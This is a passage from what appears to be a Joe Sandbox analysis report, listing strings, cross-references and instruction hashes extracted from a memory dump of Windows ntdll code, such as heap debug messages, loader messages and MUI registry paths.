                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3532704233
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3446177414-3570731704
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                              • API String ID: 3446177414-3492000579
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 3596D959
                                                                • Part of subcall function 35944859: RtlDebugPrintTimes.NTDLL ref: 359448F7
                                                              Strings
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1975516107
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                              • API String ID: 0-3063724069
                                                              Strings
                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3593D0CF
                                                              • @, xrefs: 3593D313
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3593D2C3
                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3593D146
                                                              • @, xrefs: 3593D0FD
                                                              • @, xrefs: 3593D2AF
                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3593D196
                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3593D262
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                              • API String ID: 0-1356375266
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 359B02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 359B02BD
                                                              • RTL: Re-Waiting, xrefs: 359B031E
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 3596522A
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 35965352
                                                              • Kernel-MUI-Language-Allowed, xrefs: 3596527B
                                                              • Kernel-MUI-Language-SKU, xrefs: 3596542B
                                                              • Kernel-MUI-Number-Allowed, xrefs: 35965247
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-258546922
                                                              APIs
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                              • API String ID: 0-3082644519
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                              • API String ID: 0-3061284088
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 472aeea846011f4821b984ca5689cb70f4c672450296ac41f073acb6b5a3857d
                                                              • Instruction ID: a3d3f61603c8f11b543225946bdd6642318caa2bd13f281a2292ebf9f5c5e12f
                                                              • Opcode Fuzzy Hash: 472aeea846011f4821b984ca5689cb70f4c672450296ac41f073acb6b5a3857d
                                                              • Instruction Fuzzy Hash: 28E2DD74A04315CFEB54CF69C880BA9BBF5FF48314F1485A9E849AB382D774A856CF90
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                              • API String ID: 0-2586055223
                                                              • Opcode ID: 71decd639c35ecf6e95d547b473af9701d37ee5c405674c5ec326ea2fa01ba69
                                                              • Instruction ID: 2d912f5eee3b675cf5aa805678f7016b07974ee6466968f3bdec49f88df184a1
                                                              • Opcode Fuzzy Hash: 71decd639c35ecf6e95d547b473af9701d37ee5c405674c5ec326ea2fa01ba69
                                                              • Instruction Fuzzy Hash: C5610FB6205784EFE712CB24C946FA677F9FF84754F040868F9558B292DB78E840CB62
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                              • API String ID: 0-336120773
                                                              • Opcode ID: c3aa83fd4b2b6d9e9a2404b11992e781777ec1e32525b17ea40432bb4734a262
                                                              • Instruction ID: 9a5a3c4537f68f023642e14e22ac5177f826d2c9d885dd892a42f874c5fb40e0
                                                              • Opcode Fuzzy Hash: c3aa83fd4b2b6d9e9a2404b11992e781777ec1e32525b17ea40432bb4734a262
                                                              • Instruction Fuzzy Hash: E9310F36205294EFE711CBD8C882F9A73E9FF08765F120095E411DB291EB32ED40EBA4
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                              • API String ID: 0-1391187441
                                                              • Opcode ID: ad6d83addc84c0802061a4d36bf2c38fa91685fe4f0220a51a7cf442b422d697
                                                              • Instruction ID: 433cee2553f6e0205f413ce48fe4d73a3c611120612fcff3b141964637b602d2
                                                              • Opcode Fuzzy Hash: ad6d83addc84c0802061a4d36bf2c38fa91685fe4f0220a51a7cf442b422d697
                                                              • Instruction Fuzzy Hash: CF31CF36606218EFDB01CB85C886F9AB7FEEF44760F124095E914AB291EB74ED40CE61
                                                              APIs
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: f53c8db07570b596545203dfd9d6c2b111e5b1a32a98b222279940dea27c7af1
                                                              • Instruction ID: 128940e5fb1f02af10890b1ed767e99a4938f128aba22f2a79386d143f1ab12f
                                                              • Opcode Fuzzy Hash: f53c8db07570b596545203dfd9d6c2b111e5b1a32a98b222279940dea27c7af1
                                                              • Instruction Fuzzy Hash: 145104B5A04709EFEB06CF64CE44BADB7B9FF08355F144169E412A3290DBB4AD02DB90
                                                              Strings
                                                              • HEAP[%wZ]: , xrefs: 35941712
                                                              • HEAP: , xrefs: 35941596
                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35941728
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 2bb8c221fd774ea016060f0ed7edc9530de9b3a433ab30dc1a23748f07a26fa0
                                                              • Instruction ID: 7d881291ef128e1511407559f7f9b6786261cc1f0473ce6f8e272ec889040e06
                                                              • Opcode Fuzzy Hash: 2bb8c221fd774ea016060f0ed7edc9530de9b3a433ab30dc1a23748f07a26fa0
                                                              • Instruction Fuzzy Hash: EEE101B4A043859FE719CF29C451BBABBF6BF48304F18885DE496CB246EB34E940DB50
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                              • API String ID: 0-1145731471
                                                              • Opcode ID: 184d6ee2ce18dc2d774e1082c736d7007fac126db17504397730c45727d068f8
                                                              • Instruction ID: ea78933909392b065494ebe7ab74f57a108335207a781c5c7c3ad7d945588cbf
                                                              • Opcode Fuzzy Hash: 184d6ee2ce18dc2d774e1082c736d7007fac126db17504397730c45727d068f8
                                                              • Instruction Fuzzy Hash: 36B1BDB6E187058FEB25CF69C980B9EB7B6BF48354F154529E811EB780D734E840CB20
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                              • API String ID: 0-2391371766
                                                              • Opcode ID: 0047169020f3b3aa3751d139037be014edaa3677279d109263e3623d332915f5
                                                              • Instruction ID: 9a2361a03ebc8ed29fd4e2bf7e751c9df1b5fc1a1ac1ac62d3c4f17eff5e184a
                                                              • Opcode Fuzzy Hash: 0047169020f3b3aa3751d139037be014edaa3677279d109263e3623d332915f5
                                                              • Instruction Fuzzy Hash: 19B198B2608345AFE711CE54D8C0F5BB7F8BB48754F41086AFA41AB280DB75E815CB92
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                              • API String ID: 0-318774311
                                                              • Opcode ID: 403d5119168f3e243ed7bc5ff0bac7db94cb23f4d25df2207f852ff93d475b22
                                                              • Instruction ID: 85c42008438e8812a0000b196c89c880108255ec941b18b9ef7fa38036bf68b5
                                                              • Opcode Fuzzy Hash: 403d5119168f3e243ed7bc5ff0bac7db94cb23f4d25df2207f852ff93d475b22
                                                              • Instruction Fuzzy Hash: 07818BB5608740AFE711CF25C840B6AB7E8FF89791F44892DF9819B391DB74E904CB62
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                              • API String ID: 0-3870751728
                                                              • Opcode ID: 5927a2a1da4e91c8788e597f30b0325c189d5af81e267144b27689356137d6ea
                                                              • Instruction ID: 63e1abc90892d9e249b8c375217a746c884b831e23b01a7e2b7bab126ad91cc8
                                                              • Opcode Fuzzy Hash: 5927a2a1da4e91c8788e597f30b0325c189d5af81e267144b27689356137d6ea
                                                              • Instruction Fuzzy Hash: 47913BB4E002099FEB14CF69C980BADBBF1BF48354F1481AED905AB291E7759842CF95
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                              • API String ID: 0-373624363
                                                              • Opcode ID: 9936a4f52cd9b46abd7e9dd040145c1898c9663a34af3652ee51a567b7aa4351
                                                              • Instruction ID: 376e75c827de8e4e56db3b09a428cdb7bf0736f5836c0a659feb865ebbcd65c0
                                                              • Opcode Fuzzy Hash: 9936a4f52cd9b46abd7e9dd040145c1898c9663a34af3652ee51a567b7aa4351
                                                              • Instruction Fuzzy Hash: 0391AEB6A08359CBEF21CF58C540BAEB7B6FF05364F144195EC51AB290D7B89E40CBA0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$@
                                                              • API String ID: 0-1537733988
                                                              • Opcode ID: 06b768fc1dc8bfa1752d5ffa1c255ec25960aff4457b12de727e5aa3754d3a03
                                                              • Instruction ID: a63f578ddd4dbc4f77725ce6cc8cf890649772e94ca8c2a442e5f01355f40e8b
                                                              • Opcode Fuzzy Hash: 06b768fc1dc8bfa1752d5ffa1c255ec25960aff4457b12de727e5aa3754d3a03
                                                              • Instruction Fuzzy Hash: 9971BF74609301DFE714DF24C980A1BBBFEFF85658F108A1EE49A87291DB71E905CB92
                                                              Strings
                                                              • GlobalizationUserSettings, xrefs: 35A1B834
                                                              • TargetNtPath, xrefs: 35A1B82F
                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 35A1B82A
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                              • API String ID: 0-505981995
                                                              • Opcode ID: bde92ca955d7cf9c08e683963a1e05826623937cbd25ef297beea2b49511a5d9
                                                              • Instruction ID: 9014c6119cee783c243ede4184b56411a9ec5a2b732f1082825322178e0d2396
                                                              • Opcode Fuzzy Hash: bde92ca955d7cf9c08e683963a1e05826623937cbd25ef297beea2b49511a5d9
                                                              • Instruction Fuzzy Hash: 47616B7294122DABDB21DF54DC88F9AB7F8AB08750F4101E9AD09A7250DB749F85CF90
                                                              Strings
                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3599E6C6
                                                              • HEAP[%wZ]: , xrefs: 3599E6A6
                                                              • HEAP: , xrefs: 3599E6B3
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                              • API String ID: 0-1340214556
                                                              • Opcode ID: 3360b2a9f956c144afd05239505d7040cba476c47839fd8c173cc949cf438f40
                                                              • Instruction ID: be965e5b16ef393a87cb3490e230ca832b0f9a905e882eaa6e377aa0d78adf10
                                                              • Opcode Fuzzy Hash: 3360b2a9f956c144afd05239505d7040cba476c47839fd8c173cc949cf438f40
                                                              • Instruction Fuzzy Hash: 9B51E475705B84EFE716CBA8C885F9ABBF9FF05344F0404A5E5828B692D778E940CB60
                                                              Strings
                                                              • LdrpCompleteMapModule, xrefs: 359AA590
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 359AA59A
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 359AA589
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                              Strings
                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 359B1B39
                                                              • minkernel\ntdll\ldrtls.c, xrefs: 359B1B4A
                                                              • LdrpAllocateTls, xrefs: 359B1B40
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • Actx , xrefs: 359733AC
                                                              • RtlCreateActivationContext, xrefs: 359B29F9
                                                              • SXS: %s() passed the empty activation context data, xrefs: 359B29FE
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                              Strings
                                                              • @, xrefs: 359CB670
                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 359CB632
                                                              • GlobalFlag, xrefs: 359CB68F
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                              Strings
                                                              • minkernel\ntdll\ldrtls.c, xrefs: 359B1A51
                                                              • LdrpInitializeTls, xrefs: 359B1A47
                                                              • DLL "%wZ" has TLS information at %p, xrefs: 359B1A40
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                              Strings
                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3598127B
                                                              • BuildLabEx, xrefs: 3598130F
                                                              • @, xrefs: 359812A5
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: RtlValidateHeap
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: kLsE
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Log$RXACT
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                              • API String ID: 0-118005554
                                                              • Opcode ID: a928529e56d029bb7783572ecabbc3e9e10544e420e59f2aa21966b33410e68a
                                                              • Instruction ID: 5bb9b64b855c116ccad1b2ddebe3f0eadbc26f0bde77d7352c6f6126972f330a
                                                              • Opcode Fuzzy Hash: a928529e56d029bb7783572ecabbc3e9e10544e420e59f2aa21966b33410e68a
                                                              • Instruction Fuzzy Hash: 15310B7520C3819BD301CF29D845B1AB3F8FF89350F804869F8418B381EB32E901CBA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@
                                                              • API String ID: 0-380025441
                                                              • Opcode ID: 6bb33c98bf627c6a0f2d7c9c0839e4253fa05ef65f7f2eb6a9bbb53307784306
                                                              • Instruction ID: 5af0987b7d088e67e8a30723a80f02182f83b6449fd1844299e4d9488b869746
                                                              • Opcode Fuzzy Hash: 6bb33c98bf627c6a0f2d7c9c0839e4253fa05ef65f7f2eb6a9bbb53307784306
                                                              • Instruction Fuzzy Hash: 1D316FB6609304DFD321CF28C880A5BBBF8FF89694F80092EF99487251DA35DD058B92
                                                              Strings
                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 359B2A95
                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 359B2A90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                              • API String ID: 0-2653619699
                                                              • Opcode ID: dcb16c0471cbc006bdee776c2816078cdd894401218ff8aa439196fb6ab9a0c2
                                                              • Instruction ID: 634ff3e6d7e978c34cdec63dd63ef3bf9f9fb58a611a9443a1f9f2536dce21ad
                                                              • Opcode Fuzzy Hash: dcb16c0471cbc006bdee776c2816078cdd894401218ff8aa439196fb6ab9a0c2
                                                              • Instruction Fuzzy Hash: A7112CB6B04205BBFB29CA488D41F5F76BDEF88B54F15806A7A04EF285D6B4DD0086E0
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 35A13356
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID:
                                                              • API String ID: 4062629308-0
                                                              • Opcode ID: 1bf32ba30e9874a5817be07ff9f85f31cf47b2d3cafb6be98bdd888a053ef4ba
                                                              • Instruction ID: 88923e048291febe81893f6fe5f7e1cf056d1c1a012759ec244848a43565cea0
                                                              • Opcode Fuzzy Hash: 1bf32ba30e9874a5817be07ff9f85f31cf47b2d3cafb6be98bdd888a053ef4ba
                                                              • Instruction Fuzzy Hash: 39C136B59017198FDB20DF1AC884A99FBF5FF88314F5081AED95EAB250D774AA81DF00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 30248845f506f4ce7ef05012ea53e038b8bf2cdbaf7de1cb168bb3aa1dee917a
                                                              • Instruction ID: c97bfd6f8892e1e83bb7770f61b15ddddde22fbd92266ad44f02dd429f377a44
                                                              • Opcode Fuzzy Hash: 30248845f506f4ce7ef05012ea53e038b8bf2cdbaf7de1cb168bb3aa1dee917a
                                                              • Instruction Fuzzy Hash: 74B100B56083808FD355CF28C580A5AFBF1BB88304F544A6EE899DB352D771E945CB82
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33e935d1c9612f009ac0a1d4c8bb96771d71d8b9003dc29412122cc8e3fa4227
                                                              • Instruction ID: b78b1698832b9a31c77d2bc319ddf0e8cf887f5dd92a2b5e3ee1ad726d21bb1f
                                                              • Opcode Fuzzy Hash: 33e935d1c9612f009ac0a1d4c8bb96771d71d8b9003dc29412122cc8e3fa4227
                                                              • Instruction Fuzzy Hash: 8BA147B5608345CFD310CF28D880A1ABBFABF88354F10496EE5859B351EB70ED46CB92
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a934804f272b45e08a4b23a22bc7f562ff649433cf93c47c70b3ff5f4f7c1495
                                                              • Instruction ID: bb9fe43bb058090e11d22325d258d1464fe68bbe4d46b9b1705974ffd7032a39
                                                              • Opcode Fuzzy Hash: a934804f272b45e08a4b23a22bc7f562ff649433cf93c47c70b3ff5f4f7c1495
                                                              • Instruction Fuzzy Hash: E46141B5B04609EFDB18CF78C880A9DFBB6BF88254F14856AD419A7341DB34AD52CBD0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b68ffa1611dbeb8961db1e06f69003f04172b93802734bdd6014a5227b675e65
                                                              • Instruction ID: b3aaac3bd78065af188687e61bf9f6109f0eeddd938734960f1f6c755c746575
                                                              • Opcode Fuzzy Hash: b68ffa1611dbeb8961db1e06f69003f04172b93802734bdd6014a5227b675e65
                                                              • Instruction Fuzzy Hash: 304137B49153889EDB10CFA9C880AAEBBF8FF48344F50816EE459A7211DB30A901DF64
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 70cc30a98fd2f3b6337703f00a3a68c9202e156df540691546479d3ba7553fec
                                                              • Instruction ID: 70ca69067dc4031f10379a21531d4df924a1f1559845b79807a99d3fe59fb099
                                                              • Opcode Fuzzy Hash: 70cc30a98fd2f3b6337703f00a3a68c9202e156df540691546479d3ba7553fec
                                                              • Instruction Fuzzy Hash: C031E076602304EFC711CF18C881A5A77BAFF853A4F504669ED459B292DB31ED42CBE0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: dd8c98064019c612f865339f8f2d114e7e68fa43966f43918ddf24a9d5592ef5
                                                              • Instruction ID: b9b1ec2afa20302516408c72cbb6358838d48713f8b0b232895bea6a7c4722e3
                                                              • Opcode Fuzzy Hash: dd8c98064019c612f865339f8f2d114e7e68fa43966f43918ddf24a9d5592ef5
                                                              • Instruction Fuzzy Hash: 94318976715A05AFE745CB68CA80E8ABBB6FF48254F445025EC0187B51DB75EC31CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
